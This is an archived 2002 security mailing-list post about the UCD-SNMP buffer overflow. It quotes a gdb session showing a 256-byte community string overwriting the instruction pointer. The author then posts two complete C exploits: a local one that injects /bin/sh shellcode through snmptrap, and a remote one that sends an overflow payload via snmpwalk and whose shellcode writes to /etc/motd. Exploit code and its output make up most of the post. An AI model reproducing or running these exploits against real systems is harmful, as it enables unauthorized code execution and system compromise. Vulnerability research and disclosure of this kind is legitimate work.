Re: Exploiting SNMP?

From: Nash Leon (nashleon@yahoo.com.br)
Date: 02/16/02


Date: Sat, 16 Feb 2002 07:24:13 -0300 (ART)
From: Nash Leon <nashleon@yahoo.com.br>
To: VULN-DEV@SECURITYFOCUS.COM


 --- H D Moore <slist@digitaloffense.net> escreveu: >
On Thursday 14 February 2002 12:36 pm,
> foob@return0.net wrote:
> > Has anyone tried exploiting the SNMP problems
> disclosed in the recent CERT
> > notice, and original investigated by the
> University of Oulu?
>
> The UCD-SNMP4.2.1 package is trivial to exploit. A
> community string of
> exactly 256 bytes will smash eip. All testing was
> done on Linux, with both
> the Red Hat 7.1 RPM and the source installs of
> 4.2.1. Every version prior to
> 4.2.2 seems to be vulnerable to this (except some of
> the OBSD versions).
>
> Here is a quick session log, showing eip being
> overwritten in ucd 4.0.1:
>
> [root@penny /root]# snmpd -version
> [root@penny /root]# snmpd
> [root@penny /root]# ps ax | grep snmpd
> 20279 pts/0 S 0:00 snmpd
> 20283 pts/0 S 0:00 grep snmpd
> [root@penny /root]# which snmpd
> /usr/sbin/snmpd
> [root@penny /root]# gdb /usr/sbin/snmpd
> GNU gdb 4.18
> Copyright 1998 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General
> Public License, and you are
> welcome to change it and/or distribute copies of it
> under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show
> warranty" for details.
> This GDB was configured as "i386-redhat-linux"...(no
> debugging symbols
> found)...
> (gdb) attach 20279
> Attaching to program: /usr/sbin/snmpd, Pid 20279
> Reading symbols from /usr/lib/libsnmp.so.0...(no
> debugging symbols
> found)...done.
> Reading symbols from /lib/libnsl.so.1...done.
> Reading symbols from /usr/lib/librpm.so.0...done.
> Reading symbols from /lib/libdb.so.2...done.
> Reading symbols from /usr/lib/libz.so.1...done.
> Reading symbols from /lib/libm.so.6...done.
> Reading symbols from /lib/libc.so.6...c
> done.
> Reading symbols from /usr/lib/libbz2.so.0...done.
> Reading symbols from /lib/ld-linux.so.2...done.
> Reading symbols from /lib/libnss_files.so.2...done.
> 0x29b54e in __select () from /lib/libc.so.6
> (gdb) c
> Continuing.
>
> In another terminal:
> [root@penny /root]# snmpwalk 127.0.0.1 `perl -e
> 'print "\x90" x 256'`
>
> Back to gdb:
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x90909090 in ?? ()
> (gdb)
> UCD-snmp version: 4.0.1
> Author: Wes Hardaker
> Email:
ucd-snmp-coders@ucd-snmp.ucdavis.edu

Hi all!

The informations in this post is correct! I wrote some
exploits for kit ucd-snmp. There are many problems in
snmp_api(MAX_STRING_LEN):

/* Written by Nash Leon -
http://coracaodeleao.virtualave.net/
 * nashleon@yahoo.com.br.
 * Kimera - Solucoes em Seguranca.
 * http://www.kimera.com.br/
 * Tested on UCD-SNMP-4.2.1 - Slackware 7.0.
 *
 * Exploit Sample for snmp_api() bug.
 *
 * Thanks for Kimera, Unsekurity Scene, Guys from PT,
 * Axur Corp., BufferOverflow.org, Int 0x80, Core SDI,
 * #int80h and all latin hackers.
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

#define NOP 0x90
#define OFFSET 0
#define ALIGN 0
#define BUFLEN 2584 // Slack 7.0
#define ERRO -1

char shellcode[]=
 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]){
char *buffer;
long retaddr;
int i ,tamanho = BUFLEN, offset = OFFSET;

if (argc > 1) {
offset = atoi(argv[1]);
}

printf("Local Exploit for snmp_api by Nash
Leon...\n\n");

if(!(buffer = (char *)malloc(tamanho))){
fprintf(stderr,"Unable to allocate memory!!\n");
exit(1);
}

retaddr = 0xbffff812 - offset;
printf("Using retaddr: 0x%x\n\n",retaddr);

for (i=0;i<tamanho;i+=4)
       {
                buffer[i+ALIGN]=(retaddr&0x000000ff);
               
buffer[i+ALIGN+1]=(retaddr&0x0000ff00)>>8;
               
buffer[i+ALIGN+2]=(retaddr&0x00ff0000)>>16;
               
buffer[i+ALIGN+3]=(retaddr&0xff000000)>>24;
        }
for (i=0;i<(tamanho-strlen(shellcode)-100);i++)
   *(buffer+i) = NOP;

memcpy(buffer+i,shellcode,strlen(shellcode));

/*
execl("/usr/local/bin/snmpset","snmpset","localhost","system.sysContact.0",
"s",buffer,0); */
/* or again: */
execl("/usr/local/bin/snmptrap","snmptrap","localhost","private","localhost",
"127.0.0.1","3","0","system.sysContact.0","s",buffer,0);

}

Note this programs is not suid in default instalation.
Remotely, there are many problems too, in snmpd and
snmptrapd. Below, we can see one example of exploit
for the information provide for H D Moore:

/* Remote Exploit for UCD-SNMP prior 4.2.2 by Nash
Leon.
 * nashleon@yahoo.com.br
 * Kimera - Solucoes em Seguranca.
 * http://www.kimera.com.br/
 *
 * Tested on:
 * Slackware 7.0;
 * Private Version, tested on:
 * Slackware 8.0;
 * FreeBSD 4.2;
 *
 * Credits: CERT Advisore - http://www.cert.org/ -
CA-2002-03.snmp.
 * Thanks for Kimera, Unsekurity Scene, Axur Corp.,
BufferOverflow.org,
 * Guys from Portugal(#alrg), #int80h, Core-SDI and
all Latin Hackers.
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

#define ERROR -1
#define BUFLEN 252
#define NOP 0x90
#define OFFSET 0
#define RET 0xbfffc9a4 // Slackware 7.0
#define ALIGN 0

/* ShellCode write in /etc/motd(Script Kiddie?)
 */

unsigned char x86_linux[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\xeb\x20\x5e\x8d"
"\x1e\x88\x56\x09\xb0\x05\x66\xb9\x02\x0c\xcd\x80\x8d\x4b\x0a\x89"
"\xc3\xb0\x04\xb2\x08\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80\xe8\xdb"
"\xff\xff\xff/etc/motd8NashLeon\x0A";

int main(int argc, char *argv[]){
unsigned long ret=RET;
char *buffer;
unsigned int i, j;

if(argc < 2){
printf("Remote Exploit for UCD-SNMP by Nash Leon\n");
printf("Kimera - Solucoes em Seguranca\n");
printf("http://www.kimera.com.br/\n\n");
printf("Uso: %s <ip_dest> <ret> <offset>\n",argv[0]);
exit(0);
}

printf("Executing Exploit....\n");

buffer = (char *)malloc(BUFLEN);
if(buffer == NULL){
printf("Unable to aloc memory!");
exit(ERROR);
}

if(argv[2] != NULL){
ret = atoi(argv[2]);
}

if(argv[3] != NULL){
ret = ret + atoi(argv[4]);
}

printf("Using Address: %p\n",ret);

for (i = 0; i <= BUFLEN; i += 4 ){
   buffer[i]=(ret & 0xff);
   buffer[i+ALIGN+1]=(ret & 0xff00) >> 8;
   buffer[i+ALIGN+2]=(ret & 0xff0000) >> 16;
   buffer[i+ALIGN+3]=(ret & 0xff000000) >> 24;
}

for (i = 0; i < BUFLEN - strlen(x86_linux) - 144; i++)
         *(buffer+i) = NOP;

memcpy(buffer + i, x86_linux, strlen(x86_linux));

printf("BuffLengh: %d\n",strlen(buffer));
execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);
printf("Exploit Terminated!!\n");
return 0;

}

This example only add one string in /etc/motd(not for
script kiddies).

Regards,

Nash Leon.

PS: Sorry my poor english.
New version of UCD-SNMPd in http://www.net-snmp.org/

_______________________________________________________________________________________________
Yahoo! GeoCities
Tenha seu lugar na Web. Construa hoje mesmo sua home page no Yahoo! GeoCities. É fácil e grátis!
http://br.geocities.yahoo.com/



Relevant Pages

  • BETA3 Python (Danjgo) libthr crash
    ... I get the following crash when running the Django development server (non ... GDB is free software, covered by the GNU General Public License, and you are ... Reading symbols from /lib/libutil.so.7...done. ... Loaded symbols for /lib/libutil.so.7 ...
    (freebsd-current)
  • Re: process hanging on 7.2-PRERELEASE
    ... GDB is free software, covered by the GNU General Public License, and you are ... There is absolutely no warranty for GDB. ... Loaded symbols for /lib/libgcc_s.so.1 ... Reading symbols from /lib/libthr.so.3...done. ...
    (freebsd-stable)
  • Re: Apparent regression in r250359
    ... Sample gdb output: ... Core was generated by `cupsd'. ... Reading symbols from /usr/lib/libssl.so.6...done. ... Loaded symbols for /usr/lib/libssl.so.6 ...
    (freebsd-stable)
  • Apparent regression in r250359
    ... Sample gdb output: ... Core was generated by `cupsd'. ... Reading symbols from /lib/libz.so.6...done. ... Loaded symbols for /usr/lib/libssl.so.6 ...
    (freebsd-stable)